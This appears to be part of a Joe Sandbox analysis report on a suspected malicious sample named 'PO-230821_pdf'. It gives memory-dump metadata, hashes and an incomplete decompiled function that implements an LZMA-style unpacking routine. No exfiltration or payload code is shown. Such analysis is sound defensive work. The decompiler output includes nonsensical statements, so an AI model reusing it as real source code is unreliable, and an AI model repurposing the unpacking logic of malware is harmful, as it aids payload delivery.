0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
